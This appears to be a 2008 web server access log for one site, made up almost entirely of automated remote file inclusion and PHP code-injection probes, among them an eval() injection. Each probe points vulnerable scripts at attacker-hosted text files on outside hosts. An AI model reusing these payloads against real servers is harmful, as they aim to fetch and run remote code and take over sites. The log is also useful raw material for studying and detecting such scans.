207.57.2.157 - - [19/Nov/2008:13:25:29 -0800] "GET /logs/access_080924.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:13:25:30 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:13:25:30 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
212.227.119.13 - - [19/Nov/2008:13:27:44 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:13:28:17 -0800] "GET /logs/access_081004.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
67.205.28.190 - - [19/Nov/2008:13:37:20 -0800] "GET /logs//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.205.28.190 - - [19/Nov/2008:13:37:20 -0800] "GET /galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.205.28.190 - - [19/Nov/2008:13:37:20 -0800] "GET /logs/access_081002.log//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.205.28.190 - - [19/Nov/2008:13:37:42 -0800] "GET /logs/access_081002.log%20%20//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
72.9.155.94 - - [19/Nov/2008:13:37:49 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
72.9.155.94 - - [19/Nov/2008:13:37:50 -0800] "GET /errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
72.9.155.94 - - [19/Nov/2008:13:37:50 -0800] "GET /logs/errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
72.9.155.94 - - [19/Nov/2008:13:42:00 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
72.9.155.94 - - [19/Nov/2008:13:42:01 -0800] "GET /errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
72.9.155.94 - - [19/Nov/2008:13:42:01 -0800] "GET /logs/errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
66.249.73.133 - - [19/Nov/2008:13:42:10 -0800] "GET /logs/access_081115.log HTTP/1.1" 200 171434 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.agottahave.com"
72.30.79.61 - - [19/Nov/2008:13:47:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.agottahave.com"
72.30.79.61 - - [19/Nov/2008:13:47:18 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:13:48:01 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:13:52:20 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:14:04:58 -0800] "GET /logs/access_081002.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:14:04:58 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:14:04:58 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:12:31 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:12:32 -0800] "GET /components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:12:32 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:17:27 -0800] "GET /components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:19:35 -0800] "GET /logs/access_081002.log//components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:19:36 -0800] "GET /components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:19:36 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:20:51 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:20:51 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.agottahave.com"
219.85.63.226 - - [19/Nov/2008:14:26:35 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.agottahave.com"
219.85.63.226 - - [19/Nov/2008:14:26:35 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.agottahave.com"
219.85.63.226 - - [19/Nov/2008:14:29:18 -0800] "GET /poll/booth.php?include_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.agottahave.com"
219.85.63.226 - - [19/Nov/2008:14:29:18 -0800] "GET /logs//poll/booth.php?include_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.agottahave.com"
65.38.105.213 - - [19/Nov/2008:14:29:55 -0800] "GET /logs/access_080926.log/include.php?language=0&lang_settings[0][1]=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.agottahave.com"
65.38.105.213 - - [19/Nov/2008:14:29:55 -0800] "GET /include.php?language=0&lang_settings[0][1]=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.agottahave.com"
65.38.105.213 - - [19/Nov/2008:14:29:55 -0800] "GET /logs/include.php?language=0&lang_settings[0][1]=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.agottahave.com"
70.38.31.50 - - [19/Nov/2008:14:33:02 -0800] "GET /logs/access_080926.log//modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
70.38.31.50 - - [19/Nov/2008:14:33:02 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
70.38.31.50 - - [19/Nov/2008:14:33:02 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:33:35 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:14:33:53 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:14:33:53 -0800] "GET /logs//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:14:33:53 -0800] "GET /include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
65.38.105.213 - - [19/Nov/2008:14:34:15 -0800] "GET /include.php?language=0&lang_settings[0][1]=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:18 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:18 -0800] "GET /logs//include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:18 -0800] "GET /include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:19 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:19 -0800] "GET /logs//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:19 -0800] "GET /include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:21 -0800] "GET /include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:21 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:34:21 -0800] "GET /logs//include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
66.147.239.184 - - [19/Nov/2008:14:35:11 -0800] "GET /logs/access_081002.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
66.147.239.184 - - [19/Nov/2008:14:35:11 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
66.147.239.184 - - [19/Nov/2008:14:35:11 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:35:20 -0800] "GET /logs//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:35:20 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:35:20 -0800] "GET /include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:35:22 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:35:22 -0800] "GET /include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:35:22 -0800] "GET /logs//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:14:35:46 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:36:03 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:36:05 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.85.149.242 - - [19/Nov/2008:14:36:17 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:36:35 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:14:36:44 -0800] "GET /logs/access_081003.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
70.38.54.118 - - [19/Nov/2008:14:36:55 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.agottahave.com"
207.57.2.157 - - [19/Nov/2008:14:36:55 -0800] "GET /logs/access_080927.log//components/com_flyspray/startdown.php?file=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:14:38:19 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:14:42:08 -0800] "GET /logs//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:14:42:08 -0800] "GET /logs/access_081002.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:14:42:09 -0800] "GET /include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:14:49:58 -0800] "GET /logs/access_080910.log//include/write.php?dir=http://gugakedu.co.kr/kboard//v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:24 -0800] "GET /logs//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:24 -0800] "GET /logs/access_081002.log//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:24 -0800] "GET /galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:28 -0800] "GET /logs/access_081002.log%20%20/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:28 -0800] "GET /logs/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:28 -0800] "GET /home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:53:33 -0800] "GET /logs/access_080927.log%20%20/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:11 -0800] "GET /galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:11 -0800] "GET /logs/access_081002.log//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:12 -0800] "GET /logs//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:54:28 -0800] "GET /logs/access_081002.log%20%20//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:48 -0800] "GET /logs/access_081002.log%20%20/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:48 -0800] "GET /home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:48 -0800] "GET /logs/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:54:48 -0800] "GET /logs/access_080927.log%20%20/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.147.239.184 - - [19/Nov/2008:14:55:58 -0800] "GET /logs/access_080927.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
59.136.56.137 - - [19/Nov/2008:14:56:28 -0800] "GET /logs/access_081002.log%20%20//galeria.php?start=0&kategoria=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.209.236.77 - - [19/Nov/2008:14:56:56 -0800] "GET /logs/access_081002.log/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
218.219.147.58 - - [19/Nov/2008:14:58:45 -0800] "GET /logs/access_080927.log%20%20/home.php?index=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
203.211.145.30 - - [19/Nov/2008:14:59:45 -0800] "GET /admin/include/lib.module.php?mod_root=http://kih0119k.realmind.net/stageon/.log/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:05:46 -0800] "GET /logs/home.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:05:46 -0800] "GET /logs/access_081002.log/home.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:05:46 -0800] "GET /home.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:06:10 -0800] "GET /logs/access_080924.log/home.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:06:56 -0800] "GET /logs/access_081002.log/main.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:06:56 -0800] "GET /main.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:06:58 -0800] "GET /logs/main.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:07:36 -0800] "GET /logs/access_080927.log/main.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
203.211.145.30 - - [19/Nov/2008:15:09:17 -0800] "GET /logs/access_080924.log//admin/include/lib.module.php?mod_root=http://kih0119k.realmind.net/stageon/.log/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
203.211.145.30 - - [19/Nov/2008:15:09:17 -0800] "GET /admin/include/lib.module.php?mod_root=http://kih0119k.realmind.net/stageon/.log/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
203.211.145.30 - - [19/Nov/2008:15:09:18 -0800] "GET /logs//admin/include/lib.module.php?mod_root=http://kih0119k.realmind.net/stageon/.log/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.agottahave.com"
84.21.71.133 - - [19/Nov/2008:15:12:26 -0800] "GET /logs/access_081002.log%20/main.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:33 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:34 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:34 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:35 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:35 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:35 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:41 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:42 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:22:42 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:06 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:06 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:06 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:11 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:12 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
